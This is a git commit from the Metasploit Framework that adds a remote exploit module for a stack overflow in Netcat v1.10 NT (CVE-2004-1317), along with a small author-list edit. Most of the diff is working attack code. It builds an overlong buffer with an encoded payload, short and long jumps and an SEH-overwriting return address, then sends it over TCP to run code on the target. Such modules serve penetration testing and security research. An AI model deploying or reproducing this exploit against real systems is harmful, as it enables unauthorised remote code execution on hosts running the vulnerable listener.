First commit. Added Netcat NT module.

git-svn-id: file:///home/svn/framework3/trunk@5123 4d416f70-5f16-0410-b530-b9f4589650da
2007-09-26 13:44:25 +00:00 · 2007-09-26 13:44:25 +00:00 · 09485b52e7
parent 792b4464f4
commit 09485b52e7
2 changed files with 84 additions and 2 deletions
--- a/lib/msf/core/module/author.rb
+++ b/lib/msf/core/module/author.rb
@ -22,6 +22,7 @@ class Msf::Module::Author
 			'cazz'      => 'bmc' + 0x40.chr + 'shmoo.com',
 			'pusscat'   => 'pusscat' + 0x40.chr + 'metasploit.com',
 			'skylined'  => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
+			'patrick'   => 'patrick' + 0x40.chr + 'aushack.com',
 		}

 	#
@ -87,7 +88,7 @@ class Msf::Module::Author
 		#   user[at]host.tld
 		#   Name <user [at] host.tld>

-		
+
 		if ((m = str.match(/^\s*([^<]+)<([^>]+)>\s*$/)))
 			self.name  = m[1].sub(/<.*/, '')
 			self.email = m[2].sub(/\s*\[at\]\s*/, '@')
@ -105,7 +106,7 @@ class Msf::Module::Author
 		if self.name
 			self.name.gsub!(/\s+$/, '')
 		end
-		
+
 		return true
 	end

--- a/modules/exploits/windows/misc/netcat110_nt.rb
+++ b/modules/exploits/windows/misc/netcat110_nt.rb
@ -0,0 +1,81 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Misc::NetCat110_NT < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Netcat v1.10 NT Stack Overflow',
+			'Description'	=> %q{
+			This module exploits a stack overflow in Netcat v1.10 NT. By sending
+			an overly long string we are able to overwrite SEH. The vulnerability
+			exists when netcat is used to bind (-e) an executable to a port in doexec.c.
+			This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
+			},
+			'Author'		=> 'patrick',
+			'Arch'			=> [ ARCH_X86 ],
+			'License'		=> MSF_LICENSE,
+			'Version'		=> '$Revision$',
+			'References'	=>
+			[
+				[ 'BID', '12106' ],
+				[ 'CVE', '2004-1317' ],
+				[ 'OSVDB', '12612' ],
+				[ 'URL', 'http://www.milw0rm.com/exploits/726' ],
+			],
+			'Privileged'		=> false,
+			'DefaultOptions'	=>
+			{
+				'EXITFUNC'	=> 'thread',
+			},
+			'Payload'		=>
+				{
+					'Space'				=> 236,
+					'BadChars'			=> "\x00\x0a\x0d",
+					'StackAdjustment'	=> -3500,
+				},
+			'Platform' => ['win'],
+			'Targets'  =>
+			[
+			# Patrick - Tested OK 2007/09/26 w2ksp0, w2ksp4, xpsp2 en.
+				[ 'Universal nc.exe', { 'Ret' => 0x0040a6ce } ], # p/p/r nc.exe
+			],
+			'DisclosureDate' => 'Dec 27 2004',
+			'DefaultTarget' => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def exploit
+		connect
+
+		sploit = rand_text(277, payload_badchars)
+		sploit[0, payload.encoded.length] = payload.encoded
+		sploit[236, 2] = Rex::Arch::X86.jmp_short(6)
+		sploit[240, 4] = [target['Ret']].pack('V')
+		sploit[244, 5] = Rex::Arch::X86.jmp(0xffffff08)
+
+		sock.put(sploit)
+
+		handler
+		disconnect
+	end
+end
+end
+